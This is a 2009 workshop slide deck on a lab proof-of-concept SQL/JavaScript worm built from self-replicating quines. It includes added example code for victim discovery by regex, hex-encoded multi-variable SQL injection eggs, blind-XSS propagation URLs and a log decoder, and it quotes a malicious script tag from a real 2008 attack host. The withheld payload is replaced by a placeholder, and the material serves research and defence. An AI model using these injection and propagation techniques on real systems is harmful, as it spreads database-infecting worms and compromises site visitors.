
August 26th, 2009

SQL/JavaScript Hybrid Worms
As Two-stage Quines
Workshop Seguridad Informática 2009 – 38 JAIIO (MDQ)
Lic. José Orlicki (jorlicki@)

Page 1 - CONFIDENTIAL -
Not-So-Secret Agenda

- Motivation
- Hybrid Scenario
- Features Discussion
- Proof of Concept Highlights
- Demo & Discussion!?

Abstract: a what-if worm scenario, based on real SQL/JS incidents and prototype code, leads to a laboratory proof of concept built on widely deployed (unhardened) technologies. It helps anticipate future trends and protections.

Attacks in the Wild! (2008)

- "[..] Anyone know about www.nihaorr1.com/1.js? The db that supports our company's ecommerce is filling up with this url [..]"
- "[..] The script www.nihaorr1.com/1.js is getting inserted into every record of my organization's SQL db. I'm the accidental techie in my office, and I'm clueless [..]"
- "Huge Web Hack Attack Infects Many Pages", Gregg Keizer, Computerworld (nihaorr1 -> favorite search engine)
Prototype of infected RFIDs! (2006)

- "Is Your Cat Infected with a Computer Virus?", Melanie R. Rieback, Bruno Crispo, Andrew S. Tanenbaum
- SQL virus prototype propagating via RFID tags. (Virus != Worm?)
- Uses SQL quines, self-replicating statements.

SQL and JavaScript can be combined in a Worm?

Basic Quines in T-SQL and JavaScript

- Version 1: classic quine technique in T-SQL (the statement carries its own text as a string and rebuilds itself from it).
- Version 2: quine using a native reflection hack in T-SQL (the statement obtains its own text from the server instead of carrying it).
- Version 3 (fail!): classic and native getElementById() quine techniques in JavaScript
  - Similar to Version 1, but on the JS/client side.
  - Similar to Version 2, likewise on the client side.

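The two quine constructions the deck lists, as an added example written in JavaScript (it is not the deck's T-SQL or JS code) so they run under Node.js without a database: the classic data-plus-code quine of Version 1, which in T-SQL is the same construction with REPLACE() substituting a copy of the string (single quotes doubled) for a placeholder, and the reflective quine of Version 2 and of Version 3's getElementById() variant, where the program reads its own source back from the runtime. Using Function.prototype.toString to stand in for the server-side reflection and for the browser's read of its own script element is an assumption of this example.

```javascript
// Added example, not code from the deck. Runs under Node.js.
// Both T-SQL quines on the slides rest on one of these two ideas; the SQL
// text itself is not reproduced here, only the construction.

// Technique 1: the classic data+code quine (the deck's Version 1). The
// program is a string holding its own text with a placeholder, followed by
// code that substitutes a quoted copy of the string for the placeholder.
// In T-SQL the same construction is REPLACE() with the single quotes doubled;
// here JSON.stringify() produces the quoted copy.
const QUINE_DATA = "var s = %; s.replace('%', JSON.stringify(s))";

function buildClassicQuine() {
  // String.prototype.replace with a string pattern replaces only the first
  // match: the placeholder after "var s =". The second '%' (the pattern in
  // the replace call) is left alone, so the output keeps the same code half.
  return QUINE_DATA.replace("%", JSON.stringify(QUINE_DATA));
}

// Evaluates a program in the global scope and compares the value of its last
// expression with the program text itself.
function runsAsQuine(program) {
  return (0, eval)(program) === program;
}

// Technique 2: reflection (the deck's Version 2 in T-SQL, and the
// getElementById() variant of Version 3 in the browser). The runtime already
// holds the program text, so the program asks for it instead of carrying a
// copy. Function.prototype.toString is assumed here to stand in for the
// server's view of the running batch and for reading the <script> element
// back from the DOM.
function reflectiveQuine() {
  return reflectiveQuine.toString();
}

// Reflection is only a quine if the text it hands back, run again, hands
// back the same text.
function reflectiveQuineRoundTrips() {
  const src = reflectiveQuine();
  const again = (0, eval)("(" + src + ")");
  return again() === src;
}

console.log(buildClassicQuine());
console.log(runsAsQuine(buildClassicQuine()));
console.log(reflectiveQuineRoundTrips());
```

The first technique is the one that survives translation into a database: the data half can be stored in a column and the code half can be a single REPLACE(), which is why it is the natural stage for a worm that must write itself into text fields.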


Proof of Concept

- Lab:
  1. CherryPy,
  2. Two ad-hoc vulnerable web apps in different domains,
  3. MS-SQL,
  4. Python SQL interface, no modifications.
- Two-stage self-replication.
- Targets VARCHAR and TEXT db fields, in ALL TABLEs…
- Version 1: MS-SQL quines, JavaScript regexes to extract possible new victim URLs, blind injection. (7359 bytes of SQLi egg)
- Version 2: MS-SQL reflective features. (approx. 3000 bytes, otherwise as Version 1)
- Version 3 (fail!): JavaScript quines and reflection worked, the complete worm did not. (estimated 1500 bytes)

Proof of Concept (cont.)

- SQL hex and URL encoding: stealth and SQLi correctness. 4-variable scattered egg (the original 2008 attack used 1 variable):

http://192.168.1.105:8081/greetUser?numid=1%3BDECLARE+@S+VARCHAR(MAX),@S2+VARCHAR(MAX),@S3+VARCHAR(MAX),@S4+VARCHAR(MAX)%3BSET+@S=CAST(0x0d0a444398498468...

- Regex matching for detecting possible new victim sites:

// URL-like run, a "/", a last segment, then "=<digits>": links whose
// numeric parameter is a candidate injection point
var regexp = new RegExp("[a-zA-Z0-9-.?_&=:\/]+\/[a-zA-Z0-9-\.?_&=]+=[0-9]+", "g");
var m = infected_html.match(regexp); // null when nothing matches

- JavaScript blind XSS for propagation (very naive!):

// one GET per candidate: the egg rides on the numeric parameter and
// nothing is read back (blind)
document.write(
  "<img src=" + NEW_VICTIM_URL + sql_egg + ">"
);
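The client-side propagation step above run end to end, as an added example that is not the deck's PoC code: the deck's victim regex over a constructed infected page, the hex-encoded and scattered egg, the propagation URL, and the decoder an incident responder needs to read such an egg out of a request log. The host names, sample HTML and placeholder payload are constructed; how the four variables are reassembled on EXEC is this example's assumption about the deck's 4-variable form; the real stage-one egg (the UPDATE over every VARCHAR/TEXT column) is deliberately not reproduced.

```javascript
// Added example, not the deck's PoC code. Runs under Node.js (uses Buffer).
// Host names, the sample HTML and the payload below are constructed.

// (1) Victim discovery: the deck's regex as a literal. It matches a URL-like
// run of characters, a "/", a last segment and a trailing "=<digits>", i.e.
// links with a numeric parameter that might be injectable. A relative link
// such as "/greetUser?numid=7" has no "/" after the first character of the
// run and is not matched, which is part of why the deck calls this naive.
const VICTIM_RE = /[a-zA-Z0-9.?_&=:\/-]+\/[a-zA-Z0-9.?_&=-]+=[0-9]+/g;

function findVictims(infectedHtml) {
  return infectedHtml.match(VICTIM_RE) || [];
}

// (2) Hex encoding. The egg travels as a 0x... literal that SQL Server CASTs
// back to VARCHAR(MAX): the injected text contains no quotes, so it stays
// valid whatever the quoting context of the vulnerable statement, and the
// keywords are invisible to filters that do not decode hex.
function toSqlHex(text) {
  return "0x" + Buffer.from(text, "latin1").toString("hex");
}

function fromSqlHex(hexLiteral) {
  return Buffer.from(hexLiteral.replace(/^0x/i, ""), "hex").toString("latin1");
}

// (3) Scattered egg. Assumption about the deck's "4-variable" form: the payload
// is cut into pieces, each SET from its own hex literal, and reassembled only
// inside EXEC, so no single literal carries a recognizable statement.
function wrapEgg(payloadSql, parts = 4) {
  const size = Math.ceil(payloadSql.length / parts);
  const chunks = [];
  for (let i = 0; i < payloadSql.length; i += size) {
    chunks.push(payloadSql.slice(i, i + size));
  }
  const names = chunks.map((_, i) => "@S" + (i + 1));
  const declare = "DECLARE " + names.map((n) => n + " VARCHAR(MAX)").join(",");
  const sets = chunks.map(
    (c, i) => "SET " + names[i] + "=CAST(" + toSqlHex(c) + " AS VARCHAR(MAX))"
  );
  // Leading ";" closes the victim's statement; trailing "--" discards its tail.
  return ";" + [declare, ...sets, "EXEC(" + names.join("+") + ")"].join(";") + ";--";
}

// (4) Propagation: the egg is appended to the numeric parameter the regex
// found, URL-encoded so it survives as a query string (the deck's slide
// encodes by hand and leaves more characters raw).
function propagationUrl(victimUrl, egg) {
  return victimUrl + encodeURIComponent(egg);
}

// (5) Responder's check: decode a request line from a web log and return the
// text behind every hex literal in it, in order.
function decodeEggsFromRequest(requestLine) {
  const plain = decodeURIComponent(requestLine.replace(/\+/g, " "));
  const hexes = plain.match(/0x[0-9a-fA-F]+/g) || [];
  return hexes.map(fromSqlHex);
}

// Constructed sample: a page whose text columns already carry the stage-two
// script, plus a few links of the kind the regex is looking for.
const INFECTED_HTML = [
  '<p>Hello <script src="http://www.nihaorr1.com/1.js"></script></p>',
  '<a href="http://shop.example.test/catalog/item.php?id=42">item</a>',
  '<a href="http://shop.example.test/catalog/search?q=shoes">search</a>',
  '<a href="/greetUser?numid=7">relative link, missed by the regex</a>',
  '<a href="http://other.example.test:8081/greetUser?numid=1">greet</a>',
].join("\n");

// Placeholder stage-one statement; the real egg would UPDATE every VARCHAR
// and TEXT column and is deliberately not reproduced here.
const PAYLOAD = "SELECT 'stage-one egg runs here' AS note";

const victims = findVictims(INFECTED_HTML);
const egg = wrapEgg(PAYLOAD);
console.log(victims);
console.log(egg);
console.log(decodeEggsFromRequest(propagationUrl(victims[1], egg)).join(""));
```

The decoder is the part to keep: a request whose query string contains CAST(0x... AS VARCHAR(MAX)) followed by EXEC is the signature of this whole family of attacks, and decoding the literal is what turns an opaque log line into the statement that actually ran.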
¡Hybrid Worms Discussion!

- Billy Hoffman and John Terrill, "The Little Hybrid Web Worm that Could", Black Hat USA 2007. (they focus on JS obfuscation and Perl)

- No choke point.
- Stealthier infections.
- More portability (interpreted languages?)
- Targets generic vulnerabilities (idem)
- Easily obfuscated (idem)
- Fewer crashes (idem)
- Data/Web 2.0/Cloud centric?
Demonstration!?

...but I can only show you the door. You're the one that has to walk through it...

Acknowledgements:
- Core Security Team: support and creative environment.
- Sebastián Cufre: T-SQL tricks.
- Aureliano Calvo: Javascript concepts.
- Pedro Varangot: suitable testing computer.

Questions?

- Thanks!
- Contact:
